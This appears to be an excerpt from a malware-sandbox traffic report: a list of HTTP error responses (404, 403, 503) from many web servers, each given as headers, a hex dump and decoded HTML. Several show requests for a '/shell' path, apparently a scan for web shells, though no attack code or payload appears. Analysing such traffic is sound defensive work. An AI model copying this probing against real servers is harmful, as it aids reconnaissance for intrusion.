      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 09:55:31 GMTServer: Apache/2.2.15 (CentOS) DAV/2Content-Length: 284Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 44 41 56 2f 32 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) DAV/2 Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: X-POWERED-BY: Date: Tue, 19 Jul 2022 11:08:03 GMTContent-Length: 1259Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 63 68 69 65 72 20 6f 75 20 72 e9 70 65 72 74 6f 69 72 65 20 69 6e 74 72 6f 75 76 61 62 6c 65 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 45 72 72 65 75 72
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: awselb/2.0Date: Tue, 19 Jul 2022 11:08:03 GMTContent-Type: text/plain; charset=utf-8Content-Length: 0Connection: keep-alive
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 19 Jul 2022 11:08:03 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.0X-Powered-By: ASP.NETDate: Tue, 19 Jul 2022 11:08:00 GMTContent-Length: 1238Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 6b 73 5f 63 5f 35 36 30 31 2d 31 39 38 37 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 c6 c4 c0 cf 20 b6 c7 b4 c2 20 b5 f0 b7 ba c5 cd b8 ae b8 a6 20 c3 a3 c0 bb 20 bc f6 20 be f8 bd c0 b4 cf b4 d9 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.20.2Date: Tue, 19 Jul 2022 11:08:08 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.20.2</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 12:08:08 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 19 Jul 2022 11:08:08 GMTContent-Length: 103Data Raw: 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 68 61 73 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:08:09 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:05:37 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/htmlCache-Control: no-cache, no-storeConnection: closeContent-Length: 682X-Iinfo: 14-521558-0 0NNN RT(1658228892539 0) q(0 -1 -1 -1) r(0 -1)Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 35 26 78 69 6e 66 6f 3d 31 34 2d 35 32 31 35 35 38 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 36 35 38 32 32 38 38 39 32 35 33 39 25 32 30 30 25 32 39 25 32 30 71 25 32 38 30 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 32 31 33 30 38 39 36 35 35 33 39 30 37 38 35 34 26 65 64 65 74 3d 32 32 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 47 45 54 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 32 31 33 30 38 39 36 35 35 33 39 30 37 38 35 34 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=14-521558-0%200NNN%20RT%281658228892539%200%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-2130896553907854&edet=22&cinfo=ffffffff&rpinfo=0&mth=GET" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-2130896553907854</iframe></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 19 Jul 2022 11:08:12 GMTServer: ApacheContent-Length: 207Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 19 Jul 2022 11:08:12 GMTServer: ApacheAccept-Ranges: bytesVary: Accept-EncodingCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 33 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 46 6f 72 62 69 64 64 65 6e 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cacheContent-Type: application/jsonContent-Length: 97Connection: CloseData Raw: 7b 0a 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 22 2c 0a 20 20 22 5f 5f 74 79 70 65 22 3a 20 22 43 6c 6f 75 64 53 65 61 72 63 68 45 78 63 65 70 74 69 6f 6e 22 0a 7d 0a Data Ascii: { "message": "Request forbidden by administrative rules", "__type": "CloudSearchException"}
